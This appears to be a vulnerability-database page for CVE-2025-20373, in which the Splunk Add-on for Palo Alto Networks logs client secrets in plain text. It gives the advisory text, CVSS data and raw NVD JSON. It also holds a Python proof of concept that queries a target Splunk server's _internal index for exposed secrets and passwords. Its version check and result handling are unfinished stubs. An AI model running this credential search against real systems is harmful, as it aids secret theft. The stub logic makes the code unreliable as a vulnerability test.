Security Vulnerability Report
中文
CVE-2025-20373 CVSS 2.7 LOW

CVE-2025-20373

Published: 2025-11-26 18:15:48
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

In Splunk Add-on for Palo Alto Networks versions below 2.0.2, the add-on exposes client secrets in plain text in the _internal index during the addition of new “Data Security Accounts“. The vulnerability would require either local access to the log files or administrative access to internal indexes, which by default only the admin role receives. Review roles and capabilities on your instance and restrict internal index access to administrator-level roles. See [Define roles on the Splunk platform with capabilities](https://docs.splunk.com/Documentation/Splunk/latest/Security/Rolesandcapabilities) in the Splunk documentation for more information.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Splunk Add-on for Palo Alto Networks < 2.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-20373 PoC - Splunk Add-on for Palo Alto Networks Client Secret Exposure # This PoC demonstrates how to search for exposed client secrets in Splunk _internal index import requests import json # Configuration splunk_host = "target-splunk-server" splunk_port = 8089 splunk_user = "admin" splunk_password = "password" def search_exposed_secrets(): """ Search for exposed client secrets in Splunk _internal index """ # Splunk Search Query to find exposed client secrets search_query = """ index=_internal sourcetype=splunk_web_service "client secret" OR "client_secret" OR "Client Secret" | search "Data Security" OR "Palo Alto" | rex mode=sed "s/(client_secret=)([^\\s]+)/\\1[REDACTED]/g" """ # Alternative search for direct credential exposure search_query_alternative = """ index=_internal "Data Security Account" | regex _raw="(?i)(client.?secret|password|credential).*([A-Za-z0-9+/=]{32,})" """ print("[*] Searching for exposed client secrets in _internal index...") print(f"[*] Query: {search_query}") # Execute search via Splunk REST API auth = (splunk_user, splunk_password) # Create search job search_payload = { "search": search_query, "exec_mode": "blocking", "count": 0 } try: response = requests.post( f"https://{splunk_host}:{splunk_port}/services/search/jobs", auth=auth, data=search_payload, verify=False, timeout=30 ) if response.status_code == 201: job_id = response.text.split('<sid>')[1].split('</sid>')[0] print(f"[+] Search job created: {job_id}") # Get results results_url = f"https://{splunk_host}:{splunk_port}/services/search/jobs/{job_id}/results" results_response = requests.get(results_url, auth=auth, verify=False) if results_response.status_code == 200: print("[+] Search completed. Checking for exposed credentials...") # Parse and display results (redacted) print("[!] If client secrets appear in plaintext, vulnerability is confirmed") else: print(f"[-] Search failed: {response.status_code}") except Exception as e: print(f"[-] Error: {str(e)}") def verify_vulnerability(): """ Verify if the Splunk Add-on is vulnerable by checking version """ # Check installed version via Splunk REST API apps_url = f"https://{splunk_host}:{splunk_port}/services/apps/local" try: response = requests.get(apps_url, auth=(splunk_user, splunk_password), verify=False) if "Splunk Add-on for Palo Alto Networks" in response.text: # Parse version from response if "version" in response.text: # Check if version < 2.0.2 print("[!] Vulnerable version detected (< 2.0.2)") return True except Exception as e: print(f"[-] Error checking version: {str(e)}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-20373 PoC - Splunk Add-on Information Disclosure") print("=" * 60) if verify_vulnerability(): search_exposed_secrets() else: print("[-] Target does not appear to be vulnerable or is already patched")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20373", "sourceIdentifier": "[email protected]", "published": "2025-11-26T18:15:48.137", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Splunk Add-on for Palo Alto Networks versions below 2.0.2, the add-on exposes client secrets in plain text in the _internal index during the addition of new “Data Security Accounts“. The vulnerability would require either local access to the log files or administrative access to internal indexes, which by default only the admin role receives. Review roles and capabilities on your instance and restrict internal index access to administrator-level roles. See [Define roles on the Splunk platform with capabilities](https://docs.splunk.com/Documentation/Splunk/latest/Security/Rolesandcapabilities) in the Splunk documentation for more information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "references": [{"url": "https://advisory.splunk.com/advisories/SVD-2025-1105", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.